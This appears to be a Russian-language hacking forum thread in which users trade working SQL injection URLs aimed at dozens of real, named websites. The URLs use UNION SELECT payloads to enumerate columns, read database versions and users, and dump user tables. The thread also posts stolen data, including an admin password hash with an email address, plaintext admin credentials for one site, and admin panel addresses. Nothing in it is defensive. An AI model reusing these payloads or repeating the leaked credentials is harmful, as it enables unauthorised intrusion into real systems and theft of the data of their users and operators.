SQL Инъекции

Spyder, http://www.multidmedia.com/admin/ у меня тут админка. я хз что с тобой

 

http://www.spoono.com/php/tutorials/tutorial.php?id=-1+union+select+1,2,concat(user,char(58),password),4,5,6,7,8+from+users/*

 

Code:

http://www.nero.com/eng/showpress.php?id=1015+order+by+13

Nero однако...хотя когда селект делаю не прокатывает ну хоть что-то

Code:

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,3,4,5,6,7

Code:

http://director-online.com/buildArticle.php?id=-1147+union+select+1,2,3,4,5,6,7,8+from+user/*

чёт с выводом у мня напряги

 

2 n0ne
думаю, с парсингом проблем не будет

Code:

http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user

база юзеров в формате login:рassword:email
admin f1a81d782dea6a19bdca383bffe68452 [email protected]

 

бедный директор...сколько его мучают, а он всё он-лайн бедняга

 

_http://www.toumaz.com/news/news.php?id=1000+union+select+1,2,3,version(),user(),6/*

_http://www.uecmoedling.at/news/news.php?id=90+union+select+111,222,333,user(),555,666,version(),888,999/*

_http://www.aoecs.org/news/news.php?id=30+union+select+1,2,version(),user(),5,6,7,8/*

 

http://www.happyland-drink.ru/brands.php?id=46%20AND%201=0%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

 

модный в своих кругах питерский сайт:

http://www.spbclub.ru/cgi-bin/content/show.php?dep=reviews&review=49+union+SELECT+null,null,password,null,null,null,null+FROM+users

 

_http://www.alutis.lt/news/news.php?id=-1+union+select+1,2,3,user(),version()/*

P.S. 4 поле, например user() можно посмотреть в имени рисунка (свойства картинки).



_http://www.austadiums.com/news/news.php?id=-1+union+select+user(),version()/*

_http://www.verticalworld.net/news/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
количество колонок подобрал, но имхо нет прав на добавление новости, поэтому sql-inj не работает...

 

PHP:

http://www.myminsk.com/catalog/counters.php?id=-1+union+select+1,2,table_name,4+from+INFORMATION_SCHEMA.TABLES+limit+0,1/*

PHP:

http://dicom.spb.ru/tech/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

PHP:

http://www.phpbuddy.com/article.php?id=-1+union+select+version(),2,user(),4,5,6/*

PHP:

http://www.cgekuban.ru/tenders/arti.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

 

это что типа таблицу подобрал?

 

Code:

http://www.jobit.ru/index.php?mod=employer&act=firminfo&id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x0),0x0),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

таблицу подобрать не смог

Code:

http://www.urasvadba.ru/otziv.php?id=-1+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables+limit+0,1/*

тут mysql5, но имхо пустышка) юзеров.нет

 

Опечатка... Когда нажимал контр+с, контр+в.. Я тут не подобрал таблицу, там пишит хостер что запрос отвергнут.

Скуля:

 

admin:sewa12321

Ни в чем не зашифровано.

Админка: http://www.sewa.sk/admin.php

 

PHP:

http://www.ifmsa.pl/strona.php?id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13/*


 

http://www.eu.ki/millired/news.html?ACTION=show&ID=-4+union+select+1,password,3,email+from+users/*

 

Code:

http://www.tvfolk.net/artistVideo.php?ID=-1+union+select+1,USER(),3,VERSION(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*

Code:

http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,convert(USER()+using+cp1251),4,5,6,7,8,9,0,1,2/*

 

Таблицу не подобрал ((.

 

Code:

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,USER(),6,7,8,9,0,1,2,3,4,5/*

 

Code:

http://www.ayda.ru/hotels/show_country.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+users/*